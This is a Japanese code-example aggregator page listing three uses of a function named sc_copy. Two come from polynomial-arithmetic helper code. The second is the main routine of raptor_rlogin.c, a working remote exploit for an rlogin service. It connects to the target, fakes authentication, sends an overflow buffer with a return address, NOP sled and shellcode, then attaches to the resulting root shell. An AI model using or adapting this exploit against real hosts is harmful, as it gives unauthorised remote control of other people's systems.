C++ (Cpp) sc_copyの例

プログラミング言語: C++ (Cpp)

メソッド/関数: sc_copy

hotexamples.comのコード掲載数: 3

C++ (Cpp) sc_copy - 3件のコード例が見つかりました。すべてオープンソースプロジェクトから抽出されたC++ (Cpp)のsc_copyの実例で、最も評価が高いものを厳選しています。コード例の評価を行っていただくことで、より質の高いコード例が表示されるようになります。

コード例 #1

ファイルを表示

ファイル: helper.c プロジェクト: admiraltso/scripts

/* Frobenius operation by raising varaibles tot the	*
 * pth power.						*/
struct polynomial frobenius(struct polynomial f)
{
	struct polynomial uit;
	struct term *fterm;
	struct term **ptrterm;
	uit.leading = NULL;
	ptrterm = NULL;

	uit.degree = p * f.degree;
	ptrterm = &(uit.leading);
	fterm = f.leading;
	while (fterm) {
		make_term(ptrterm);
		sc_copy(fterm->c, (*ptrterm)->c);
		(*ptrterm)->n1 = p*fterm->n1;
		(*ptrterm)->n2 = p*fterm->n2;
		(*ptrterm)->n3 = p*fterm->n3;
		(*ptrterm)->n4 = p*fterm->n4;
		ptrterm = &((*ptrterm)->next);
		fterm = fterm->next;
	}
	return(uit);
}

コード例 #2

ファイルを表示

ファイル: raptor_rlogin.c プロジェクト: BuddhaLabs/PacketStorm-Exploits

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
		case 'h':
			host = optarg;
			break;
		case 't':
			timeout = atoi(optarg);
			break;
		case 'd':
			debug = 1;
			break;
		default:
			usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);		// local login name
	p += 4;
	memcpy(p, "bar", 3);		// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));	// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");
	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# waiting for login prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);	// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;
	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");
	
	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

コード例 #3

ファイルを表示

ファイル: helper.c プロジェクト: admiraltso/scripts

/* Ouputs the derivative. 					*
 * The result is nonsense if the degree of f is too low.	*/
struct polynomial deriv(struct polynomial f, unsigned int i)
{
	mscalar c;
	struct polynomial uit;
	struct term *fterm;
	struct term **ptrterm;
	uit.leading = NULL;
	ptrterm = NULL;

	fterm = f.leading;
	switch (i) {
		case 1: 
		uit.degree = (f.degree > d1) ? (f.degree - d1) : 0;
		ptrterm = &(uit.leading);
		while (fterm) {
			sc_imult(fterm->n1, fterm->c, c);
			if (!sc_is_zero(c)) {
				make_term(ptrterm);
				sc_copy(c, (*ptrterm)->c);
				(*ptrterm)->n1 = fterm->n1 - 1;
				(*ptrterm)->n2 = fterm->n2;
				(*ptrterm)->n3 = fterm->n3;
				(*ptrterm)->n4 = fterm->n4;
				ptrterm = &((*ptrterm)->next);
			}
			fterm = fterm->next;
		}
		return(uit);

		case 2: 
		uit.degree = (f.degree > d2) ? (f.degree - d2) : 0;
		ptrterm = &(uit.leading);
		while (fterm) {
			sc_imult(fterm->n2, fterm->c, c);
			if (!sc_is_zero(c)) {
				make_term(ptrterm);
				sc_copy(c, (*ptrterm)->c);
				(*ptrterm)->n1 = fterm->n1;
				(*ptrterm)->n2 = fterm->n2 - 1;
				(*ptrterm)->n3 = fterm->n3;
				(*ptrterm)->n4 = fterm->n4;
				ptrterm = &((*ptrterm)->next);
			}
			fterm = fterm->next;
		}
		return(uit);

		case 3:
		uit.degree = (f.degree > d3) ? (f.degree - d3) : 0;
		ptrterm = &(uit.leading);
		while (fterm) {
			sc_imult(fterm->n3, fterm->c, c);
			if (!sc_is_zero(c)) {
				make_term(ptrterm);
				sc_copy(c, (*ptrterm)->c);
				(*ptrterm)->n1 = fterm->n1;
				(*ptrterm)->n2 = fterm->n2;
				(*ptrterm)->n3 = fterm->n3 - 1;
				(*ptrterm)->n4 = fterm->n4;
				ptrterm = &((*ptrterm)->next);
			}
			fterm = fterm->next;
		}
		return(uit);
		
		case 4:
		uit.degree = (f.degree > d4) ? (f.degree - d4) : 0;
		ptrterm = &(uit.leading);
		while (fterm) {
			sc_imult(fterm->n4, fterm->c, c);
			if (!sc_is_zero(c)) {
				make_term(ptrterm);
				sc_copy(c, (*ptrterm)->c);
				(*ptrterm)->n1 = fterm->n1;
				(*ptrterm)->n2 = fterm->n2;
				(*ptrterm)->n3 = fterm->n3;
				(*ptrterm)->n4 = fterm->n4 - 1;
				ptrterm = &((*ptrterm)->next);
			}
			fterm = fterm->next;
		}
		return(uit);
		
		default:
		printf("Wrong again honey!");
		exit(1);
	}
	exit(1);
}